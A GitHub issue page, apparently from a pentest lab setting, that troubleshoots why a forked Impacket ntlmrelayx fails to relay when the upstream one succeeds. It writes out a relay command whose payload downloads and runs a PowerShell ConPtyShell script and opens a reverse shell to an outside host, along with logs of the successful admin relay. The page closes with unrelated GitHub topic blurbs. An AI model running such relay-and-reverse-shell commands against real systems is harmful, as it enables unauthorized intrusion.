This project forked from fortra/impacket
Impacket is a collection of Python classes for working with network protocols.
Home Page: https://www.secureauth.com/labs/open-source-tools/impacket/
License: Other
impacket version: v0.10.1.dev1+20230909.241.3001b26
Target OS: Linux kali 6.5.0-kali2-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.5.3-1kali2 (2023-10-03) x86_64 GNU/Linux
Using pipx installation, thus it is in a fully isolated environment.
Used to use this repository instead of the official impacket repository because... it's just better. Anyway, that's not the point! So I wanted to do an NTLM relay by running a command on the target machine with:
ntlmrelayx.py --no-http-server -smb2support -t 192.168.240.212 -c 'powershell -nop -c "iex(irm http://192.168.45.242/winaries/Invoke-ConPtyShell.ps1); Invoke-ConPtyShell 192.168.45.242 443"'Connected to another machine, I use the command dir \\192.168.45.242\t to trigger the relay. And that's where things go wrong. Nothing happens:
Impacket for Exegol - v0.10.1.dev1+20230909.241.3001b26 - Copyright 2022 Fortra - forked by ThePorgs
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-5 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-6 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-7 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-8 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-9 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-10 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-11 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-12 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-13 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-14 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] SMBD-Thread-15 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212Whereas with impacket-ntlmrelayx, it works and I have my shell:
$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.240.212 -c 'powershell -nop -c "iex(irm http://192.168.45.242/winaries/Invoke-ConPtyShell.ps1); Invoke-ConPtyShell 192.168.45.242 443"'
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 192.168.240.211, attacking target smb://192.168.240.212
[*] Authenticating against smb://192.168.240.212 as FILES01/FILES02ADMIN SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] SMBD-Thread-9 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] Starting service RemoteRegistry
[*] SMBD-Thread-11 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 192.168.240.211 controlled, but there are no more targets left!What could be the root cause?
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google โค๏ธ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.